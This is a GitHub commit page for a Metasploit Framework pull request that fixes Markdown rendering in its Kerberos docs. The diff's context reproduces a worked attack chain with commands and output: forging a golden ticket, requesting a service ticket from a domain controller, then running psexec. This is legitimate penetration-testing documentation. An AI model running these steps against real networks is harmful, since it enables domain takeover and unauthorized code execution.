Skip to content

Commit d25fd08

Browse files
Merge pull request #20458 from adfoster-r7/fix-rendering-issue-on-kerberos-docs
Fix rendering issue on kerberos docs
2 parents b237751 + 093d9f9 commit d25fd08

File tree

2 files changed

+4
-4
lines changed

2 files changed

+4
-4
lines changed

docs/metasploit-framework.wiki/kerberos/service_authentication.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -142,7 +142,7 @@ Optional options:
142142
* `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
143143
* `write-only` -- New tickets are requested and they are stored for reuse.
144144
* `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
145-
* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
145+
* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
146146

147147
## Ticket management
148148

documentation/modules/auxiliary/admin/kerberos/get_ticket.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -298,14 +298,14 @@ host service type name content i
298298
TGS using a previously forged golden ticket:
299299

300300
```
301-
# Forge a golden ticket
301+
# 1. Forge a golden ticket
302302
msf auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator
303303
304304
[*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
305305
[*] Auxiliary module execution completed
306306
307307
308-
# Request a silver ticket:
308+
# 2. Request a silver ticket:
309309
310310
msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
311311
[*] Running module against 10.10.11.5
@@ -317,7 +317,7 @@ msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5
317317
[+] 10.10.11.5:88 - Received a valid delegation TGS-Response
318318
[*] Auxiliary module execution completed
319319
320-
# Use psexec:
320+
# 3. Use psexec:
321321
322322
msf exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1
323323

0 commit comments

Comments
 (0)